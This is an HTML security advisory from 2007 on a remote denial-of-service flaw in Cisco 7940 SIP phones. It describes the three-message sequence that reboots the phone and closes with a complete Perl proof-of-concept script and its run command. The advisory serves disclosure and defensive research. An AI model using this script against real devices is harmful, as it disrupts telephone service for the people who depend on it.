<html xmlns:v="urn:schemas-microsoft-com:vml" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:w="urn:schemas-microsoft-com:office:word" xmlns:st1="urn:schemas-microsoft-com:office:smarttags" xmlns="http://www.w3.org/TR/REC-html40">
<head>
<meta http-equiv=Content-Type content="text/html; charset=us-ascii">
<meta name=Generator content="Microsoft Word 11 (filtered medium)">
<o:SmartTagType namespaceuri="urn:schemas-microsoft-com:office:smarttags"
name="PlaceType"/>
<o:SmartTagType namespaceuri="urn:schemas-microsoft-com:office:smarttags"
name="PlaceName"/>
<o:SmartTagType namespaceuri="urn:schemas-microsoft-com:office:smarttags"
name="place"/>
<!--[if !mso]>
<style>
st1\:*{behavior:url(#default#ieooui) }
</style>
<![endif]-->
<style>
<!--
/* Font Definitions */
@font-face
{font-family:Wingdings;
panose-1:5 0 0 0 0 0 0 0 0 0;}
/* Style Definitions */
p.MsoNormal, li.MsoNormal, div.MsoNormal
{margin:0in;
margin-bottom:.0001pt;
font-size:12.0pt;
font-family:"Times New Roman";}
a:link, span.MsoHyperlink
{color:blue;
text-decoration:underline;}
a:visited, span.MsoHyperlinkFollowed
{color:purple;
text-decoration:underline;}
p
{mso-margin-top-alt:auto;
margin-right:0in;
mso-margin-bottom-alt:auto;
margin-left:0in;
font-size:12.0pt;
font-family:"Times New Roman";}
span.EmailStyle17
{mso-style-type:personal-compose;
font-family:Arial;
color:windowtext;}
@page Section1
{size:595.3pt 841.9pt;
margin:70.85pt 70.85pt 70.85pt 70.85pt;}
div.Section1
{page:Section1;}
/* List Definitions */
@list l0
{mso-list-id:566767589;
mso-list-template-ids:535710460;}
@list l0:level1
{mso-level-number-format:bullet;
mso-level-text:\F0B7;
mso-level-tab-stop:.5in;
mso-level-number-position:left;
text-indent:-.25in;
mso-ansi-font-size:10.0pt;
font-family:Symbol;}
@list l1
{mso-list-id:1640841892;
mso-list-template-ids:-1691044848;}
@list l1:level1
{mso-level-number-format:bullet;
mso-level-text:\F0B7;
mso-level-tab-stop:.5in;
mso-level-number-position:left;
text-indent:-.25in;
mso-ansi-font-size:10.0pt;
font-family:Symbol;}
ol
{margin-bottom:0in;}
ul
{margin-bottom:0in;}
-->
</style>
<!--[if gte mso 9]><xml>
<o:shapedefaults v:ext="edit" spidmax="1026" />
</xml><![endif]--><!--[if gte mso 9]><xml>
<o:shapelayout v:ext="edit">
<o:idmap v:ext="edit" data="1" />
</o:shapelayout></xml><![endif]-->
</head>
<body lang=FR link=blue vlink=purple>
<div class=Section1>
<p class=MsoNormal><font size=3 color=black face="Times New Roman"><span
lang=EN-US style='font-size:12.0pt;color:black'>MADYNES Security Advisory : stateful
SIP remote DOS on Cisco 7940<o:p></o:p></span></font></p>
<p><b><font size=3 face="Times New Roman"><span lang=EN-US style='font-size:
12.0pt;font-weight:bold'>Date of Discovery 3 February</span></font></b><span
lang=EN-US>, 2007<br>
<br>
<b><span style='font-weight:bold'>ID: </span></b>KIPH5<br>
<br>
<b><span style='font-weight:bold'>Synopsis</span></b><o:p></o:p></span></p>
<p><font size=3 face="Times New Roman"><span lang=EN-US style='font-size:12.0pt'>After
sending a series of three SIP messages the device reboots. The phone does not
check properly the state engine in the SIP stack<br>
The vendor was informed in March 2007 and acknowledged the vulnerability.
This vulnerability was identified by the Madynes research team at INRIA
Lorraine, using the Madynes VoIP fuzzer KIPH. This is one of the first vulnerabilities
published where advanced state tracking is required.<br>
<br>
<b><span style='font-weight:bold'>Background </span></b><o:p></o:p></span></font></p>
<ul type=disc>
<li class=MsoNormal style='color:black;mso-margin-top-alt:auto;mso-margin-bottom-alt:
auto;mso-list:l1 level1 lfo1'><font size=3 color=black
face="Times New Roman"><span lang=EN-US style='font-size:12.0pt;
color:windowtext'>SIP is the IETF standardized (RFCs 2543 and 3261)
protocol for VoIP signalization. SIP is an ASCII based INVITE message is
used to initiate and maintain a communication session. <br>
<br>
<br>
<b><span style='font-weight:bold'>Affected devices:</span></b> Cisco phone
7940 (maybe other also) running firmware </span></font><span lang=EN-US>P0S3-08-6-00
<o:p></o:p></span></li>
</ul>
<p><font size=3 face="Times New Roman"><span lang=EN-US style='font-size:12.0pt'><o:p> </o:p></span></font></p>
<p style='margin-bottom:12.0pt'><b><font size=3 face="Times New Roman"><span
lang=EN-US style='font-size:12.0pt;font-weight:bold'>Impact <br>
</span></font></b><span lang=EN-US>A malicious user can remotely crash and
perform a denial of service attack by sending three crafted SIP messages.
<br>
<br>
<b><span style='font-weight:bold'>Resolution<br>
</span></b>Fixed software will be available from the vendor and customers following
recommended best practices (ie segregating VOIP traffic from data) will be
protected from malicious traffic in most situations. <br>
<br>
<b><span style='font-weight:bold'>Credits</span></b><o:p></o:p></span></p>
<ul type=disc>
<li class=MsoNormal style='mso-margin-top-alt:auto;mso-margin-bottom-alt:auto;
mso-list:l0 level1 lfo2'><font size=3 face="Times New Roman"><span
lang=EN-US style='font-size:12.0pt'>Humberto J. Abdelnur (Ph.D Student)<o:p></o:p></span></font></li>
<li class=MsoNormal style='mso-margin-top-alt:auto;mso-margin-bottom-alt:auto;
mso-list:l0 level1 lfo2'><st1:place w:st="on"><st1:PlaceName w:st="on"><font
size=3 face="Times New Roman"><span lang=EN-US style='font-size:12.0pt'>Radu</span></font></st1:PlaceName><span
lang=EN-US> <st1:PlaceType w:st="on">State</st1:PlaceType></span></st1:place><span
lang=EN-US> (Ph.D)<o:p></o:p></span></li>
<li class=MsoNormal style='mso-margin-top-alt:auto;mso-margin-bottom-alt:auto;
mso-list:l0 level1 lfo2'><font size=3 face="Times New Roman"><span
lang=EN-US style='font-size:12.0pt'>Olivier Festor (Ph.D)<o:p></o:p></span></font></li>
</ul>
<p><font size=3 face="Times New Roman"><span lang=EN-US style='font-size:12.0pt'><br>
This vulnerability was identified by the Madynes research team at INRIA
Lorraine, using the Madynes VoIP fuzzer KIPH<o:p></o:p></span></font></p>
<p class=MsoNormal><font size=3 color=black face="Times New Roman"><span
lang=EN-US style='font-size:12.0pt;color:black'><o:p> </o:p></span></font></p>
<p class=MsoNormal><font size=3 color=black face="Times New Roman"><span
lang=EN-US style='font-size:12.0pt;color:black'><br>
Configuration of our device:<o:p></o:p></span></font></p>
<ul type=disc>
<li class=MsoNormal style='color:black;mso-margin-top-alt:auto;mso-margin-bottom-alt:
auto;mso-list:l1 level1 lfo1'><font size=3 color=black
face="Times New Roman"><span style='font-size:12.0pt'>Current Firmware
: P0S3-08-6-00 <o:p></o:p></span></font></li>
<li class=MsoNormal style='color:black;mso-margin-top-alt:auto;mso-margin-bottom-alt:
auto;mso-list:l1 level1 lfo1'><font size=3 color=black
face="Times New Roman"><span lang=EN-US style='font-size:12.0pt'>IP-Address
obtained by DHCP as 192.168.1.8 <o:p></o:p></span></font></li>
<li class=MsoNormal style='color:black;mso-margin-top-alt:auto;mso-margin-bottom-alt:
auto;mso-list:l1 level1 lfo1'><font size=3 color=black
face="Times New Roman"><span style='font-size:12.0pt'>User Name: 7940-1<o:p></o:p></span></font></li>
</ul>
<p class=MsoNormal><font size=3 color=black face="Times New Roman"><span
lang=EN-US style='font-size:12.0pt;color:black'>Vulnerability:<br>
<br>
It is based in a sequence of messages, any of the particular messages may do
any harm by itself, but all of them turn the device in an inconsistent state. The
sequence is like:<br>
<br>
X ------------------------- INVITE -----------------------> Cisco<br>
X <--- 481 transaction does not exists ----- Cisco<br>
X ------------------------- OPTIONS--------------------> Cisco<br>
X <--------------------------- OK ------------------------- Cisco<br>
X <--- 481 transaction does not exists ----- Cisco<br>
X ------------------------- OPTIONS--------------------> Cisco<br>
<br>
And the device reboots.<br>
<br>
The INVITE sent has the particularity that the remote tag is already filled. The
following two OPTIONS messages must to have the same Call-ID as the INVITE and
the CSeq number must increment, otherwise the test does not work. <br>
<br>
Exploit:<br>
<br>
To run the exploit the file stateful-cisco-8.6.pl should be launched (assuming
our configurations) as:<br>
<br>
perl stateful-cisco-8.6.pl 192.168.1.8 5060 7940-1<br>
<br>
The script is simple and does not check if which messages are received, but
just wait a second before send the next one.<o:p></o:p></span></font></p>
<p class=MsoNormal><font size=3 color=black face="Times New Roman"><span
lang=EN-US style='font-size:12.0pt;color:black'><o:p> </o:p></span></font></p>
<p class=MsoNormal><font size=3 color=black face="Times New Roman"><span
lang=EN-US style='font-size:12.0pt;color:black'><o:p> </o:p></span></font></p>
<p class=MsoNormal><font size=3 color=black face="Times New Roman"><span
lang=EN-US style='font-size:12.0pt;color:black'>#!/usr/bin/perl<o:p></o:p></span></font></p>
<p class=MsoNormal><font size=3 color=black face="Times New Roman"><span
lang=EN-US style='font-size:12.0pt;color:black'>use IO::Socket::INET;<o:p></o:p></span></font></p>
<p class=MsoNormal><font size=3 color=black face="Times New Roman"><span
lang=EN-US style='font-size:12.0pt;color:black'>die "Usage $0 <dst>
<port> <username>" unless ($ARGV[2]);<o:p></o:p></span></font></p>
<p class=MsoNormal><font size=3 color=black face="Times New Roman"><span
lang=EN-US style='font-size:12.0pt;color:black'><o:p> </o:p></span></font></p>
<p class=MsoNormal><font size=3 color=black face="Times New Roman"><span
lang=EN-US style='font-size:12.0pt;color:black'>$socket=new
IO::Socket::INET->new(PeerPort=>$ARGV[1],<o:p></o:p></span></font></p>
<p class=MsoNormal><font size=3 color=black face="Times New Roman"><span
lang=EN-US style='font-size:12.0pt;color:black'>
</span></font><font color=black><span lang=PT-BR style='color:black'>Proto=>'udp',<o:p></o:p></span></font></p>
<p class=MsoNormal><font size=3 color=black face="Times New Roman"><span
lang=PT-BR style='font-size:12.0pt;color:black'>
PeerAddr=>$ARGV[0]);<o:p></o:p></span></font></p>
<p class=MsoNormal><font size=3 color=black face="Times New Roman"><span
lang=PT-BR style='font-size:12.0pt;color:black'><o:p> </o:p></span></font></p>
<p class=MsoNormal><font size=3 color=black face="Times New Roman"><span
lang=PT-BR style='font-size:12.0pt;color:black'>$msg = "INVITE
sip:$ARGV[2]\@$ARGV[0] SIP/2.0\r\nVia:
SIP/2.0/UDP\t192.168.1.2;rport;branch=00\r\nFrom:
<sip:gasparin\@192.168.1.2>;tag=00\r\nTo:
<sip:$ARGV[2]\@$ARGV[0]>;tag=00\r\nCall-ID: et\@192.168.1.2\r\nCSeq: 10
INVITE\r\nContent-Length: 0\r\n\r\n";;<o:p></o:p></span></font></p>
<p class=MsoNormal><font size=3 color=black face="Times New Roman"><span
lang=PT-BR style='font-size:12.0pt;color:black'>$socket->send($msg);<o:p></o:p></span></font></p>
<p class=MsoNormal><font size=3 color=black face="Times New Roman"><span
lang=PT-BR style='font-size:12.0pt;color:black'><o:p> </o:p></span></font></p>
<p class=MsoNormal><font size=3 color=black face="Times New Roman"><span
lang=PT-BR style='font-size:12.0pt;color:black'>sleep(1);<o:p></o:p></span></font></p>
<p class=MsoNormal><font size=3 color=black face="Times New Roman"><span
lang=PT-BR style='font-size:12.0pt;color:black'>$msg ="OPTIONS
sip:$ARGV[2]\@$ARGV[0] SIP/2.0\r\nVia: SIP/2.0/UDP
192.168.1.2;rport;branch=01\r\nFrom:
<sip:gasparin\@192.168.1.2>;tag=01\r\nTo:
<sip:$ARGV[2]\@$ARGV[0]>\r\nCall-ID: et\@192.168.1.2\r\nCSeq: 11
OPTIONS\r\nContent-Length: 0\r\n\r\n";<o:p></o:p></span></font></p>
<p class=MsoNormal><font size=3 color=black face="Times New Roman"><span
lang=PT-BR style='font-size:12.0pt;color:black'>$socket->send($msg);<o:p></o:p></span></font></p>
<p class=MsoNormal><font size=3 color=black face="Times New Roman"><span
lang=PT-BR style='font-size:12.0pt;color:black'><o:p> </o:p></span></font></p>
<p class=MsoNormal><font size=3 color=black face="Times New Roman"><span
lang=PT-BR style='font-size:12.0pt;color:black'>sleep(1);<o:p></o:p></span></font></p>
<p class=MsoNormal><font size=3 color=black face="Times New Roman"><span
lang=PT-BR style='font-size:12.0pt;color:black'>$msg ="OPTIONS
sip:$ARGV[2]\@$ARGV[0] SIP/2.0\r\nVia: SIP/2.0/UDP
192.168.1.2;rport;branch=02\r\nFrom:
<sip:gasparin\@192.168.1.2>;tag=02\r\nTo:
<sip:$ARGV[2]\@$ARGV[0]>\r\nCall-ID: et\@192.168.1.2\r\nCSeq: 12
OPTIONS\r\nContent-Length: 0\r\n\r\n";<o:p></o:p></span></font></p>
<p class=MsoNormal><font size=3 color=black face="Times New Roman"><span
lang=EN-US style='font-size:12.0pt;color:black'>$socket->send($msg);<o:p></o:p></span></font></p>
<p class=MsoNormal><font size=3 color=black face="Times New Roman"><span
lang=EN-US style='font-size:12.0pt;color:black'><o:p> </o:p></span></font></p>
<p class=MsoNormal><font size=2 face=Arial><span lang=EN-US style='font-size:
10.0pt;font-family:Arial'><o:p> </o:p></span></font></p>
</div>
</body>
</html>